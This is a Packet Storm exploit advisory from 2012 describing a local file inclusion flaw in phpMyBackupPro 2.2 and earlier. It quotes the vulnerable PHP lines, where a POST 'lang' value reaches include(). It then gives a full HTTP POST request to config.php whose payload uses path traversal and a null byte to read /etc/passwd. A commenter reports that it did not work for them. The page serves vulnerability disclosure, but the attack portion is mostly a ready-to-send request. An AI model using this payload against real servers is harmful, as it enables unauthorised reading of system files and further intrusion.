what you don't know can hurt you

phpMyBackupPro 2.2 Local File Inclusion

phpMyBackupPro 2.2 Local File Inclusion
Posted Jul 3, 2012
Authored by dun

phpMyBackupPro versions 2.2 and below suffer from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
MD5 | aa8e9c79f09bd7316bd9dced5a67ba68

phpMyBackupPro 2.2 Local File Inclusion

Change Mirror Download
:::::::-.   ...    ::::::.    :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM

[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-07-03 ]
##################################################################
# [ phpMyBackupPro <= 2.2 ] Local File Inclusion Vulnerability #
##################################################################
#
# Script: "phpMyBackupPro is a very easy to use, free, web-based
# MySQL backup application, licensed under the GNU GPL."
#
# Vendor: http://www.phpmybackuppro.net/
# Download: http://sourceforge.net/projects/phpmybackup/files/phpMyBackupPro/
#
#
# File: ./phpMyBackupPro-2.2/config.php (line: 26)
# ..cut..
# 26 require_once("login.php"); // 1
# ..cut..
#
# File: ./phpMyBackupPro-2.2/login.php (line: 29)
# ..cut..
# 29 require_once("definitions.php"); // 2
# ..cut..
#
# File: ./phpMyBackupPro-2.2/definitions.php (lines: 201-206)
# ..cut..
# 201 // check if language was just changed in config.php
# 202 if (isset($_POST['lang']) && preg_replace("#.*/#","",$_SERVER['PHP_SELF'])=="config.php") $CONF['lang']=$_POST['lang']; // 3
# 203
# 204 // include language.inc.php
# 205 if (!isset($CONF['lang'])) $CONF['lang']="english";
# 206 if (!file_exists($prepath.PMBP_LANGUAGE_DIR.$CONF['lang'].".inc.php")) // 4
# include_once($prepath.PMBP_LANGUAGE_DIR."english.inc.php"); // 4
# else include($prepath.PMBP_LANGUAGE_DIR.$CONF['lang'].".inc.php"); // 4 [LFI]
# ..cut..
#
#
# [LFI] ( magic_quotes_gpc = Off; )
# Vuln:
#
# POST /phpMyBackupPro-2.2/config.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: pl,en-us;q=0.7,en;q=0.3
# Accept-Encoding: gzip, deflate
# Connection: keep-alive
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 39
# lang=../../../../../../../etc/passwd%00
#
### [ dun / 2012 ] #####################################################

Comments (1)

RSS Feed Subscribe to this comment feed
aletter

this one does not work for me ... :-(

Comment by aletter
2012-07-24 20:40:32 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close